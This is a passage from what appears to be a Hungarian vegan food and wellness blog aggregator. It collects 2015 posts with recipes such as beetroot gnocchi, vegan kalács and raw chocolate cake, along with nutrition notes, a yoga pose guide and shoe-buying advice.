sütőben készre sütjük. (a miénk sajnos megégett.....:-)
Vegán, epres ,,túrórudi bonbon
2015. szeptember 30. VegaNinja
Hozzávalók: 150 ml növényi tej 130 g eper 100 ml kókuszolaj 15 g rizs 1 csipet só 1 evőkanál citromlé 1 evőkanál nádcukor (vagy ennek megfelelő édesítő) fél mokkáskanál vanília őrlemény 50 g étcsokoládé 2 teáskanál repceolaj (bármilyen étolaj jó, de ennek teljesen minimális az íze, és ez jót tesz a csokinak) 1. A […]
Céklás gnocchi, diós gorgonzola szószban, és minden hónap 29 - e Gnocchi nap (gluténmentes, tojásmentes)
2015. szeptember 30. Zöld Avocado
Nagyon szeretjük az olasz konyhát. Nálunk a pizzák és a spagettik után a gnocchi állna az "Olaszország leghíresebb és legfinomabb ételei" - nek képzeletbeli dobogóján. Ezek a kis krumpligombócok ma már a Világ minden táján nagy népszerűségnek örvendenek. Egyszerűen és változatosan elkészíthető, pénztárcabarát tésztaételről van szó, mely a helyi adottságokhoz, ízvilághoz, kultúrához és természeti kincsekhez alkalmazkodva, sok száz féle tésztából, és sok ezer féle szósszal elkészítető. (Enyhe túlzással... ;-) ) Céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán), diós gorgonzola szószban (gluténmentes, tojásmentes) A gnocchik (ejtsd: nyokki) szülőföldjét Olaszországnak tulajdonítják, de a recept az évszázadok során sokat változott. Eredetileg a középkorban, nem is burgonyából, hanem búzadarából, rizslisztből, és száraz kenyérből készültek. A mai kor által leginkább ismert gombócok már buronyából születnek, és eredetük a 17. századba vezethető vissza. Spanyol felfedezők hozták be a krumplit Olaszországba, amit először csak kerti dísznövényként tartottak, majd az Európát sújtó éhínség hatására gyors térhódításba kezdett az olcsón termeszthető burgonya. Ezzel egyidőben a krumpligombóc, a krumplis gnocchi is elindult meghódítani a Világot. Bármerre járunk a Világban, nincs olyan olasz étterem, aminek az étlapján ne találkoznánk egy-egy gnocchis fogással. Az olasz bevándorlók világszerte meghonosították a gnocchi sokféle változatát. Az "ahány ház, annyi szokás" magyar közmondás tökéletesen jellemzi a gnocchi recepteket is. Még Olaszországon belül sem igazán találunk két egyforma gnocchi receptet, nemhogy a világ két különböző pontján. Természetesen mindenki a sajátját tartja az igazinak, a tökéletesnek, az eredetinek! ;-) Céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán), diós gorgonzola szószban (gluténmentes, tojásmentes) Minden olasz régiónak (főleg az észak - olasz részen) megvan a saját tipikus gnocchi tésztája, és a kedvenc mártása hozzá. Míg Veronában jellemzően paradicsom szósszal tálalják a krumpligombócokat, addig Lombardia tartományban a sajtszószokra esküsznek. Szardínia szigetén különleges egytálétel a hagyományosan sáfránnyal ízesített ,,gnocchetti" is, mely a gnocchinál lényegesen kisebb méretű tésztával készül. Sok helyen nem is burgonyából, hanem zsemlemorzsából, kukoricadarából, és különböző lisztekből készítik a gnocchi tésztát. Általánosságban elmondható, hogy a jó gnocchi legfontosabb hozzávalója az alacsony víz- és magas szárazanyag- tartalmú, ún. lisztes burgonya, kevés grízes liszt, tojás és só. Az erőteljes ízű parmezán vagy gorgonzola sajt pedig szinte mindenütt elmaradhatatlan a tetejéről. Sok receptben lehet olvasni, hogy főzzük meg a burgonyát, de azok a receptek tévednek. A tökéletes, szájban szétolvadó, nem ragacsos gnoccihoz, a burgonyákat sütőben kell megsütni, hogy kevesebb vizet engedjenek ki magukból. Minél szárazabb a krumpli, annál jobb. A tökéletes gnocchi angol kifejezéssel élve "fluffy and melt in the mouth", ami magyarul nagyjából annyit tesz, hogy "bolyhos, pihés" gombócok melyek szétolvadnak a szádban. céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán) Annyira jól sikerült a gnocchi hódító hadjárata, hogy néhány szegényebb, dél-amerikai országban (pl.: Argentínában és Uruguayban) a hónap utolsó előtti napját ,,gnocchi-napnak nevezik. Mivel a hónap elején kapott fizetés elfogy a hónap végére, így már csak olcsó ételek kerülhetnek a vacsora asztalokra. A gnocchi tökéletes választás, ezért minden hónap 29-e a dél-amerikai országokban a hivatalos DIA DE ?OQUIS, a Gnocchi nap. Ilyenkor a családok, barátok összegyűlnek, és együtt fogyasztják el a gnocchit. Hogy szerencsét hozzon, mindenki tesz egy pénz érmét a tányérja alá, és ott is hagyják a vacsora végeztéig. Ez egyfajta szerencsehozó babona arrafelé. Egyes éttermekben ezen a napon csak gnocchis fogásokat lehet választani, míg más éttermek külön erre a napra szóló gnocchi specialitásokkal rukkolnak elő. céklás gnocchi (glutén-, laktóz-, tojásmentes, vegán) Magyarország, valószínűleg Mátyás király idejében ismerkedett meg olasz szakácsok által a gnocchi akkori verzióival. A magyar gasztronómia egyik fontos étele, a nokedli is feltehetően az olasz burgonyamentes gnocchi egyik leszármazottja, illetve a burgonyával készült változat (gnocchi di patate) nagy hasonlóságot mutat a magyar krumplinudlival. Készíthetjük villával bordázott változatban, vagy anélkül. Fogyaszthatjuk különböző mártásokkal, szószokkal, sajtokkal, zöldségragukkal, de akár édesen lekvárral vagy mákkal is. A hagyományos burgonyás gnocchi mellett számos más idény zöldséggel is feltúrbózhatjuk a gnocchikat, hogy szép színes, és tápanyagdús tésztákat kapjunk eredményül. A későbbiekben hozok nektek a Zöld Avocado vegetáriánus gasztroblogra egy sütőtökös és egy spenótos tészta változatot is, most pedig a szezonnak megfelelően egy egyszerűen elkészíthető céklás gnocchi receptjét osztom meg veletek. Korábban már bemutattam, hogyan készítsetek céklás nokedlit, most egy ahhoz hasonló, de mégis más, glutén- laktóz- és tojásmentes recept következik, a könnyebb emésztés jegyében, burgonya nélkül. (Természetesen a laktózmentesség csak a gnocchikra értendő. Amennyiben a gorgonzolás szószt készítjük el hozzá, a laktózmentesség nem állja meg a helyét. Laktózérzékenyek készítsenek sajtmentes szószt a céklás gnocchi mellé.) Céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán), diós gorgonzola szószban (gluténmentes, tojásmentes) HOZZÁVALÓK (4 személyre): a vegán céklás gnocchihoz: - 300 g nyers céklapép (kb. 250 g nyers cékla + 1 dl tiszta víz) - 20 g lenmagliszt - 150 g (barna) rizsliszt - 1 tk Himalája só, őrölt fehér bors - 1/2 ek útifűmaghéj a diós gorgonzolás szószhoz: - 250 ml főzőtejszín - 200 g gorgonzola sajt - reszelt parmezán sajt a tetejére - 1 bögre dió (előre beáztatva 24 órára) - 1 marék friss petrezselyem - 2 gerezd fokhagyma - Himalája só, őrölt fehér bors, szárított oregánó - 1/2 citrom frissen facsart leve Céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán), diós gorgonzola szószban (gluténmentes, tojásmentes) ELKÉSZÍTÉS:Kb. 250 g nyers céklát meghámozunk, és 1 dl vízzel krémesre turmixolunk. Egy tálba tesszük a liszteket, a fűszereket, az útifűmaghéjat, hozzáadjuk a céklapépet, és kézzel alaposan összegyúrjuk az egészet egy nagy gombóccá. Formázható, puha, nem túl lisztes, de nem is ragadós tésztát kell kapnunk. Olyat, ami már pont nem ragad bele a tálba, de még puha. (Használjunk még lisztet, ha kell, de ne gyúrjuk túl sokáig a tésztát). Hagyjuk pihenni 15 percet a hűtőben a tészta golyót. céklás gnocchi (glutén-, laktóz-, tojásmentes, vegán) Vágjuk fel 4, majd 8 felé a gombócot, és sodorjunk belőlük kb. 1 cm átmérőjű rudakat, hengereket. Bátran lisztezzük a deszkát, és a kezünket is, ha ragadna a tészta. Vágjunk kb. 1 cm-es darabkákat az 1 cm átmérjű rudakból, majd egy villával finoman csíkozzuk be a tetejét (lisztezzük a villát, hogy ne ragadjon rá a tészta). Ettől kicsit szétlapul, így lesz henger formájú, és nem négyzet. (Négyzet alakúan, csíkok nélkül is népszerű és finom, ha nincs kedvünk formázgatni. ;-) ) Tegyünk fel egy edényben enyhén sós vizet forrni. Miután forr a víz, dobjuk bele óvatosan a nyers gnocchikat. Az összes tészta kb. egynegyedét egyszerre. (Enyhén lisztesen dobjuk bele, és akkor biztosan nem ragadnak össze.) Miután feljöttek a víz tetejére (kb. 2 perc), azonnal kiszedjük őket szűrőlapáttal egy tálba. Ne hagyjuk ázni feleslegesen! Eljátszuk ezt az összessel, tehát négyszer, amíg el nem fogy a nyers tészta. Ha úgy látjuk, hogy nem lesz szükségünk az összes tésztára, akkor még nyersen fagyasszuk le a felesleget. A következő 1-2 hónapban bármikor elővehetjük őket, és kivéve a fagyasztóból tegyük bele a forrásban lévő vízbe. Fagyasztott állapotában azonban több idő kell neki, így akár 5 - 7 percig is tarthat, míg feljönnek a víz tetejére. Úgy is lefagyaszthatjuk a felesleget, hogy kifőzzük a tésztát, hagyjuk kihűlni, enyhén lisztezzük, hogy ne ragadjanak össze, majd tegyük őket a fagyasztóba. Ezesetben csak pár hétig érdemes felhasználni, és fogyasztás előtt, kb. 5 perc alatt fel lehet melegíteni egy olajos serpenyőben, vagy 10 perc alatt a sütőben. Nem kell újra kifőzni! ;-) Fogyasszuk a gnocchikat, tetszés szerinti szósszal, sajtokkal, zöldségekkel, akár serpenyőben lepirítva is. Ezúttal egy diós gorgonzolás szószt készítettem hozzá, mert az ízes sajt - dió - cékla trió mindig levesz a lábamról. :-) A főzőtejszínbe daraboljuk a gorgonzola sajtot, hozzáadjuk a sót, borsot, fokhagymát, petrezselymet, a beáztatott dió felét ledarálva, a citrom levét, és az egészet folytonos kevergetés mellett besűrítjük. Céklás gnocchival tálaljuk a szószt, megszórjuk a maradék széttördelt dióval és friss parmezánt szórunk rá. (A diót azért áztatjuk be előre min. 24 órára, hogy az enzimgátlók kioldódjanak, és egészségesebb, egyszerűbben emészthető diót kapjunk.) Céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán), diós gorgonzola szószban (gluténmentes, tojásmentes) Színélményben, ízélményben és tápanyagban gazdag jó étvágyat kívánunk! :-) Megjegyzés: Egy kis érdekesség...."Rómában a gn occhi egy tradicionálisan csütörtökön fogyasztandó étel, amelyet a következő mondás is tükröz: ha csütörtök akkor gnocchi, ha péntek akkor hal, ha szombat akkor pacal.("Gioved? gnocchi, Venerdi pesce, Sabato Trippa") Veronában egy nagy tányér paradicsomos gnocchit esznek meg hagyományosan a " Ven?rdi Gnocol?r napján, ami a karneváli kocsik felvonulásának napja. Végül de nem utolsó sorban a veronai álarcosbál hercegének is mi más lehetne a neve, mint Gombóc Apó azaz Pap? del Gnoco." Forrás: Íz és Itália Céklás gnocchi (gluténmentes, laktózmentes, tojásmentes, vegán), diós gorgonzola szószban (gluténmentes, tojásmentes)
A dió jótékony hatásai
2015. szeptember 27. Élj harmóniában
Itt van az ősz és a hőmérséklet csökkenésével, kívánja a szervezet a tartalmasabb táplálékokat. A legtöbb haza kiskertben megtalálható legalább egy diófa. A dió egy olyan csonthéjasunk, amely igencsak tápláló és melynek nem csak a belsejét, de gyógyászati célokra a levelét és a külső burkát is gyűjtik. A táplálkozásunkban is változatosan tudjuk felhasználni. Süteményekbe, salátákba, sós és édes ételekbe is tehető, továbbá magában is nagyon ízletes. Egy egy marék dió elfogyasztása, nagyon sok pozitív hatással bír. Gazdag sszenciális zsírsavakban, ásványi anyagokban, vitaminokban (foszfor , kalcium kálium, vas, cink, réz, magnézium, B vitaminok, E vitamin) Magas a fehérjetartalma, megfelelően komplettálva (szénhidrátokkal kiegészítve) nagyon jó teljes értékű fehérjeforrás vegetáriánusok számára (pl. diós tészta). Csökkenti a szív és érrendszeri betegség kialakulásának kockázatát, egészséges szinten tartja a vérnyomást. Normalizálja a koleszterinszintet. Segít rugalmasan tartani az ereket. Erősíti az immunrendszert és antioxidáns hatású. Támogatja az idegrendszer működését. Az ájurvéda nehéz minőségűnek tartja, Fogyasztása növeli a Kapha-t, Pitta-t és csökkenti a Vata-t . A többi dió és magféle fogyasztását is érdemes beépíteni az étrendbe. A manduláról itt olvashatsz.
Tégy a gerinced egészségéért! - Trikonászana (háromszögállás)
2015. szeptember 26. Élj harmóniában
A trikonászana (háromszögállás) stimulálja a gerinc területét, nyújtja, erősíti a gerinc menti izmokat, megszünteti a hátfájást. A pózban erősödnek a lábak, a combok a csípő körüli izmok. Az oldalra döntésben a légzésünk segítségével jól át tudjuk masszírozni a belső szerveket ezáltal serkentve a belső szervek munkáját (máj, gyomor, belek, lép, vesék. Az ászana segíti a méregtelenítést, segíti az emésztést, megszünteti a székrekedést, a vérképzéshez is hozzájárul. A trikonászanát javasolják rendszertelen menstruáció esetén is. A csípőre lerakódott fölöslegtől is könnyen megszabadulhatunk a tirkonászana rendszeres gyakorlásával. Hogyan végezd el? - Állj meg egy közepes szélességű terpeszben - kb. egyenlő oldalú háromszög - és a lábaid középsőtengelye legyen párhuzamos egymással. - A bal lábfejedet fordítsd el teljesen balra (kb. 90 fok) majd a jobb lábfejedet is fordítsd el kicsit balra. úgy hogy a sarkad hátrébb kerüljön mint a lábujjaid. - A bal lábad sarkától, ha húzol egy képzeletbeli vonalat kb. a jobb lábfejedet középen metszi. - Minkét lábadnál próbálj figyelni arra, hogy a térdkalácsod megtartott legyen - ehhez próbáld felhúzni a combizom segítségével a térdkalácsot és próbálj dolgozni a belső boka területével. - Fordítsd előre a medencédet, de figyelj, hogy a térdedet ne csavard el. - Húzd be a farok csontod a farizmok segítségével magad alá és nyújtózkodj fejtetővel, nyújtsd meg az egész gerincedet hosszan. - Emeld a karjaidat oldalsó középtartásba és a lapockáidat simítsd be a hátadba - figyelj, hogy a vállakat ne húzd fel a füleidhez. - A medence helyzetét stabilan megtartva nyújtózz a bal karoddal és a törzseddel oldalra hosszan. - Kilégzéssel dönts baloldalra, figyelve, hogy a medencédet ne mozdítsd el. Próbáld a tested egy síkban tartani és a két lábadon a testsúlyt egyformán oszlasd el. - A bal kezeddel támaszkodj meg finoman a bal lábadon - figyelj rá, hogy csak annyira menj mélyre, ahol még tudod tartani a medencédet. - A jobb tenyeredet fordítsd előre és a két karod egymás folytatása legyen. - A tekinteted még nézzen előre, nyújtózz a tarkóddal, fejtetővel, majd fordítsd a tekinteted a felül lévő kezed irányába. Kijövetel a pózból belégzéssel, gyere vissza a kiindulási helyzetbe, majd végezd el a gyakorlatot a másik oldalra is. A kitartás alatt stabilan tartsd a lábakat, egyenletesen elosztva a testsúlyt a két lábon és megtartva a térdkalácsokat. Kilégzéssel a hátul lévő lábad külső talp élét és sarkát told a talajba és belégzéssel abból nyújtsd meg a hátul lévő oldalad. A combjaiddal finoman próbálj kifelé csavarodni. Dolgozz aktívan a farizmokkal, mert segítenek a medencédet stabilan megtartani. A has is végig aktívan megtartott. A lapockáidat simítsd a hátadba és próbáld belégzéssel nyitni a mellkast folyamatosan azáltal, hogy távolítod a két kulcscsontot - úgy dolgozz, ahogy Tádászanában (A tádászanáról itt olvashatsz). Kilégzéssel próbálj még jobban elcsavarodni a törzseddel hátrafelé fölfelé. Amennyiben gond van a nyakaddal, nyakcsigolyáiddal, akkor a tekinteted nézzen előre és ne fordítsd el a fejed. Ne végezd deréktáji gerincsérv esetén. Komoly gerincbetegségek esetén mindenképpen konzultálj szakemberrel. Amennyiben magas vérnyomással küzdesz felül lévő kezedet ne emeld a magasba és a tekintetedet se fordítsd el fölfelé.
A sárgarépa jotékony hatásai
2015. szeptember 24. Élj harmóniában
A sárgarépát gyerekként kedveltem meg. Nagypapám mindig azt mondta, hogy egyek sokat mert akkor majd tudok fütyülni. Sok sok kiló sárgarépa elfogyasztása után sem tudtam fütyülni, de a "klasszikus" magyar konyhából - leveszöldség, főzelékek és kb a sütőben sült krumpli, sült tök és főtt kukorica ami zöldséges ételként megfordult nálunk otthon - nekem a sárgarépa volt a kedvenc zöldségem. Már tinédzserkoromban is ha valamit csak úgy rágcsálni szerettem volna, sokszor esett a válassztásom egy szál sárgarépára:) Azon túl, hogy ízletes miért jó rendszeresen fogyasztani? Gazdag vitaminokban, ásványi anyagokban, legkiemelkedőbb a béta karotin tartalma. A szervezet a béta karotint szükség esetén A vitaminná alakítja. A sárgarépa fogyasztása hozzájárul a jó látáshoz is és segít egészségesen tartani a n yálkahártyákat. Kedvezően hat a bőrproblémáknál, széppé teszi a bőrt. Segít a beleket megtisztítani és eltávolítani a salakanyagokat, méregteleníteni. C sökkenti a koleszterinszintet. Fogyókúrák esetén is jól hasznosítható. T ámogatja a máj tisztulását és erősíti az immunrendszert. Csökkenti a daganatos betegségek kockázatát és regeneráló szerként is használják. Í zületi gyulladás esetén is kedvezően hat, elősegíti a gyógyulási folyamatokat. Fogyaszthatod nyersen elrágva, vagy reszelve salátában, répalé formában, levesekben, párolva, főzve, sütve még édességek tésztájába keverve is kellemes kompozíciót kapunk:) Az ájurvédában édes minősége miatt, vata csökkentő hatást tulajdonítanak neki, de a pittát és kaphát kismértékben növeli. A föld alatt növő zöldségfélék közül a sárgarépa szattvikusnak minősül. (erről bővebben itt olvashatsz) Téli időszakra szakszerűen elvermelve jól tárolható zöldség.
Vegán kalács
2015. szeptember 23. Zizi kalandjai
Noha szeretem a kelt tésztás süteményeket, ritkán fogok neki az elkészítésüknek. Mostanában csak a főzésre koncentrálok, örülök, hogy ezt tudom abszolválni, sütésre már nem igazán marad idő. Vagyis készülnek édességek, de azok többnyire nyersek, amit a robotgépben össze tudok aprítani/pürésíteni, beteszem a hűtőbe és már készen is van. Nem kell dagasztani, keleszteni, mégis van édesség.
Ezzel nem azt akarom mondani, hogy egy időigényes kelt tészta, sütemény elkészítése nem lehet relaxáló… de igenis lehet, csak ne ugráljon az ember lánya mellett egy 2 éves. Szóval nagy ritkán, amikor igazán kedvet kapok hozzá, bevetem magam a konyhába és bármi áron is képes vagyok például egy kalácsot megsütni. Főleg, ha az kihívást is jelent, akkor igazán izgalmas a dolog (mert például vegán kalács, amit még soha nem készítettem). Így született meg életem első vegán kalácsa. Még nem lett olyan foszlós, mint a nagymamám (és anyukám) változata, de közel jár hozzá. Gondolom csak gyakorolnom kell a dagasztás rejtelmeit és még többet koncentrálnom az elkészítésére és egyszer én is foszlós kalács gyártó leszek.
Nektek van tuti vegán kalács receptetek?
Vegán kalács
Hozzávalók:
– 450 g tönköly fehérliszt + egy kevés a gyúráshoz, formázáshoz
– 40 g kókuszzsír (ha van extra szűz, az még jobb, de lehet használni jó minőségű margarint is)
– 25 g friss élesztő vagy 9 g szárított élesztő
– 80 g nádcukor
– 170 ml rizstej (zab-, mandula- vagy szójatej is használható)
– csipet só
A hozzávalókat egy órával a kezdés előtt tegyük szobahőmérsékletű helyre. A sütőt melegítsük elő 180C fokra.
Az élesztőt 50 ml langyos tejjel elkeverjük és beleöntjük a sóval és cukorral elkevert átszitált lisztbe. Összekeverjük és kb. 10-15 percig állni hagyjuk. Hozzáöntjük a maradék langyos tejet, az olvasztott kókuszzsírt, majd gyúrjuk, hogy nyúlós, de nem ragadós tésztát kapjunk (a tészta elválik a táltól és szép fényes lesz; ha szükséges, adjunk még hozzá lisztet). Meleg helyen, letakarva egy órát kelesztjük.
A tésztát deszkára/gyúrólapra borítjuk, három egyenlő részre osztjuk és egyenként kisodorjuk, kicsit megcsavargatjuk. A három szálat megfonjuk és kókuszzsírral kikent tepsibe rakjuk, majd fél órát pihentetjük. Rizstejjel megkenjük a kalács tetejét és az előmelegített sütőben aranybarnára sütjük.
Hogyan válassz cipőt? néhány tanács a láb egészségének érdekében
2015. szeptember 22. Élj harmóniában
Sajnos a lakosság jelentős része küzd ma lábproblémákkal. Jógaoktatóként naponta szembesülők vele, hogy a legtöbb embernek komoly láb deformitási problémái vannak és nagyon sokan küzdenek lábfájdalmakkal (sarokfájdalom, bütyök, égő talpi fájdalom, tyúkszem etc.) továbbá gyakori a talp boltozati eltérésből fakadó tartáshiba, hátfájdalom, derékfájás, fejfájás, nyaki panaszok, térd vagy éppen csípőfájdalmak. A lábunk a testünk talapzata és a teljes testsúlyunkat kell megfelelően alátámasztania. Továbbá segíti a testet a járásban, előre haladásban. A láb 26 csontból, 33 ízületből, 107 szalagból és megannyi izomból áll. A láb boltozatait az izmok megfelelő állapota hozza létre (hosszanti boltozat, harántboltozat). A megfelelő boltozatok segítenek abban, hogy a testünk statikailag megfelelő alapokon álljon és a terhelés egyenletesen legyen elosztva. Ha az alátámasztás megfelelő az segíti a helyes testtartást és az izmok, szalagok, ízületek terhelése optimális lesz, sehol nincs túlterhelés, feszültség. Amikor a talpboltozat nem megfelelő, az túlterheléshez, helytelen testtartáshoz, a gerinc egészégének romlásához, talp deformitásokhoz vezethet. A talpboltozat elváltozásainak és láb problémák hátterében általában helytelen életmódunk és a divatos lábbelik állnak. A láb eredetileg egyenetlen talajon való járásra van kitalálva, sem a hosszan tartó ülés, sem a hosszan tartó állás nem tesz jót. A trendi cipők pedig, amennyiben nem felelnek meg a megfelelő lábbeli elvárásainak, akkor komoly kockázatokat jelentenek a láb problémák kialakulására. A magas sarkú cipők, szűkorrú cipők, lapos talpú cipők, túl kemény talpú cipők a lábat túlterhelik, deformitásokhoz, betegségekhez vezetnek. Ha már valamilyen probléma kialakult a lábon, célszerű kivizsgáltatni és szükség esetén megfelelő cipőt, betétet használni. Amikor a talpboltozaton elváltozás van, az kockázatot jelent gerincünk egészségére, továbbá mivel a talpboltozati eltérés miatt nem megfelelően oszlik el a terhelés, azért ez komoly problémákat jelenthet akár a térd vagy csípő területén is. Az elváltozásokat célszerű megelőzni, illetve időben kezelni - talpbetét beszerzésével kompenzálni. Így tehermentesíthetjük az ízületeket, szalagrendszert, gerincet. Megelőzhetjük a lábfájdalmat és láb deformitásokat. A lábproblémák megelőzéséhez egyik nagyon lényeges dolog a rendszeres testmozgás. Lábproblémák megelőzésének másik feltétele a megfelelő lábbeli. Mivel a láb nagyon nagy terhelésnek van kitéve egész nap, ezért meghatározó, hogy milyen lábbelit hordunk. Milyen a jó lábbeli? Segít a helyes testtartás kialakításában, kényelmes, nem nyomja, dörzsöli a lábunkat sehol. A jó lábbeli talpa rugalmas, puha, mert a nagyon merev talp nehézséget okozhat a járásban. A jó lábbeli természetes alapanyagból készül, hogy a test számára minél kedvezőbb legyen. Minden cipőnek van címkéje, mint az élelmiszereknek és a ruhaneműknek. Érdemes vásárlás előtt szemügyre venni a cipőhöz használt alapanyagokat. Amikor cipőt választasz figyelj rá, hogy megfelelően tág legyen, elférjen benne a lábad. Ehhez a lábunknak megfelelő szélesség, hosszméret és magasság figyelembe vétele is szükséges. A cipő kérge jó ha tartás biztosít a láb számára, jól rögzíti a sarkat. A cipő felsőrészének megfelelő tartást kell a láb elülső része számára biztosítani. A talp legyen csúszásmentes, mert ez biztosítja a stabil járást. Ha sok időt töltesz otthon és házimunka közben sokat állsz vagy sétálgatsz, mindenképpen olyan házicipőt, papucsot válassz, amely maximális kényelmet és alátámasztást biztosít a lábad számára. Ha van kialakult bütyköd vagy kalapácsujjad, annak célszerű olyan cipőt választani, amelynek a felső része is nagyon puha - így további nyomást nem gyakorol az érintett területre. Hölgyeknél a 2-4 cm-es sarok ami a nap során is használható, ennél magasabb sarkú cipők viselése hosszú távon komoly problémákhoz vezethet. Mindig az alkalomhoz megfelelő cipőt viselj. Pl. egy körömcipő nem arra van kitalálva, hogy egész nap hord. Ha a munkádhoz fontos a csinos cipő, akkor amíg pl az íróasztalnál ülsz, addig válts kényelmes lábbelire vagy papucsra és a munkába is kényelmes cipőbe menj - a magassarkút csak annyi ideig viseld, amíg szükséges. Lehetőleg délután indulj el cipőt vásárolni, mert ekkor már némi terhelésnek ki volt téve a lábad, másképpen érzékelheted egy cipő kényelmét, mint pl kora reggel. A cipőt mindkét lábadra próbáld fel és járkálj is benne az üzletben figyeld meg mennyire kényelmes járás közben. Amennyiben van talpbetéted, azt vidd magaddal a vásárláshoz és olyan zoknit, harisnyát is vigyél, amilyennel majd szeretnéd hordani a cipőt. Így a cipőt úgy tudod felpróbálni, ahogy majd valójában használni fogod - talpbetéttel és a megfelelő zoknival.
Nyers csokoládétorta + Segítsüti 2015. ősz
2015. szeptember 21. Zizi kalandjai
Újra indul az őszi Segítsüti jótékony akciója. A Segítsüti története 2009-ben indult, az első, gasztrobloggerek civil összefogásával született jótékonysági süteményárveréssel. Mostanra kinőtte magát, így évente kétszer kerül már megszervezésre, tavasszal és ősszel. A mostani, 13. alkalommal a Segítsüti a Mosoly Alapítványt, és rajtuk keresztül a beteg és lelki traumát átélt gyermekek gyógyulását támogatjuk.
Röviden a részletek...
1) Kik? Ismét 30 gasztroblogger anyuka/apuka készül 30 édességgel, az akció adminisztrációját - beszerzések, pénzügyi elszámolás - pedig szokás szerint a Sose Közhasznú Alapítvány intézi.
2) Mikor? A sütilicit 2015. szeptember 21-én, hétfőn indul, azaz ma fognak megjelenni a sütis bejegyzések az egyes blogokon, és kerülnek fel majd egyidejűleg a licitálós menü alá. Ezután kezdődhet rájuk rögtön a licitálás, amely három napon át zajlik és 2015. szeptember 24-én, csütörtökön 16:00-kor zárul.
3) Kit támogatunk? A befolyt támogatási összegből most a Mosoly Alapítványt, és rajtuk keresztül a beteg és lelki traumát átélt gyermekek gyógyulását támogatjuk. Az alapítvány ingyenes mese- és művészetterápiákkal kezeli, enyhíti a gyerekek testi betegségével járó pszichés problémáit.
4) Hogyan? Minden tepsi sütemény kikiáltási ára továbbra is 1.000 forint lesz. A liciteket a Sütiárverés menüpont alatt lehet majd megtenni, ehhez pedig egy egyszerű regisztráció (név, e-mail cím) szükséges. A nyertes az lesz, aki a legmagasabb összeget ajánlja adott süteményért szeptember 24-én 16:00-ig.
Az idén a már slágernek számító nyers csokoládétortával készülök. Jellemezhetném azzal, hogy ez a torta az egészséges bűnbeesés. Nyers, vegán, ráadásul a legcsokisabb élmény! Ha leszámítjuk a benne lévő 100 gramm kókuszvirág cukrot, csak egészséges, tápláló, vitaminokban, ásványi anyagokban gazdag alapanyagokból áll (mandula, datolya, avokádó, nyers kakaópor, vanília). Aki megteheti, licitáljon a nyers csokitortámra, mert a nyertes licitáló nagyon jól fog járni ezzel a finom sütivel! Fontos infó a nyertes számára, hogy a torta személyesen vehető majd át Budapesten. Hajrá licitálók!
Nyers csokoládétorta
Hozzávalók egy 18,5 cm-es csatos formához:
Torta alaphoz:
- 100 g mandula
- 70 g datolya, kimagozva
- 1/2 teáskanál tengeri vagy Himalája só
Krémhez:
- 2 érett nagy avokádó
- 70 g nyers kakaópor (helyettesíthető normál cukrozatlan kakaóporral)
- 50 g extra szűz kókuszolaj
- 100 g kókuszvirág cukor (helyettesíthető - lehetőleg nyers - nádcukorral)
- 1 vaníliarúd kikapart magjai
- csipet tengeri vagy Himalája só
Ha van időnk, áztassuk be a mandulát hideg vízbe legalább 6 órára, majd szűrjük le. Az áztatás felszabadítja a mandulában lévő enzimgátlókat, így könnyebb megemészteni. Ha nincs időnk, akkor tegyük egyből a robotgépbe a mandulát, és daráljuk meg. Adjuk hozzá a kimagozott datolyákat és a sót. Dolgoztassuk a gépet addig, amíg a torta alapunk összeáll tésztává. Ha nagyon száraznak érezzük, adjunk hozzá 1-2 teáskanál kókuszolajat.
A tortaformát béleljük ki folpackkal és nyomkodjuk az aljába a datolyás mandulás keveréket, majd tegyük a mélyhűtőbe megkeményedni, amíg elkészítjük a krémet. Tegyünk minden hozzávalót a robotgépre és pürésítsük krémesre. Vegyük ki a formát, kanalazzuk az alapra a krémet és tegyük vissza a mélyhűtőbe 1 órára. Ha türelmetlenek vagyunk, már 45 perc után kivehetjük.
Nyers eperleves
2015. szeptember 20. VegaNinja
Hozzávalók: (1-2 adag) 250 g eper 250 ml növényi tej 30 g banán 30 ml narancslé 1 csipet só 1 teáskanál nádcukor 1 késhegynyi fahéj 1. Az epret turmixoljuk össze a narancslével és a banánnal. 2. Sózzuk, édesítsük és ízesítsük fahéjjal. 3. Adjuk hozzá a növényi tejet, majd jól turmixoljuk át így is! A […]
Mézédes élet? – Haszonállatok a kaptárban
2015. szeptember 19. VegaNinja
A háziméhek haszonállatok, akárcsak a sertések vagy a szarvasmarhák. Az utóbbiak kihasználása mind átláthatóbbá válik, míg a méhekéről kevesebbet tudunk, noha termékeiket fogyasztjuk, profitszerzés céljából tenyésztjük, adjuk-vesszük, bizonyos esetekben megöljük őket. Miért vagyunk közönyösek a méhek szenvedése iránt? Csak mert rendszertanilag távol állnak tőlünk, nem indokolt, hogy kevesebb együttérzést mutassunk irántuk, mint egy orangután iránt. […]
A húsevés vége
Az ember addig tud húst enni, amíg nem érti meg és érzi át, honnan jön és milyen következményekkel jár amíg az állatból húst gyártanak. Én túlestem rajta, vegetáriánus lettem. Elmondom, miért és hogyan. Elöljáróban: én is szeretem a sült kolbászt, a füstölt sonkát. Csak nem eszem. Azt is tudtam rég, hogy a nagyüzemi állattartás rossz, az állatoknak nagyon sok szenvedést okoz, a környezetpusztító, éghajlatváltoztató tevékenységek közül pedig az első helyen áll. Ennek jelentőségét az eddigi legforrób nyár után nem kell ecsetelni. És az állatokat is ,,szerettem'', mindig is.
Cukkinis-karobos sütemény
2015. szeptember 13. Vegán Család
Hozzávalók:
(1 csésze = 2,5 dl)
1 csésze méz (édesszájúaknak 1,5 vagy 2 csésze)
1 csésze hidegen sajtolt olívaolaj vagy napraforgó olaj
2 csésze durvára reszelt cukkini
1 ek vanília aroma vagy fél vaníliarúd őrölve
1 csomag foszfátmentes sütőpor
1 tk só
1 tk őrölt fahéj
fél csésze durvára aprított dió vagy mandula
4 ek karobpor
4 csésze teljes kiőrlésű búzaliszt
2 ek kókusz- vagy gesztenyeliszt (elhagyható)
1,5 ek kukoricakeményítő
kevés víz a kukoricakeményítő kikeveréséhez
[...] Bővebben!
Miért érdemes hajdinát fogyasztani?
2015. szeptember 10. Élj harmóniában
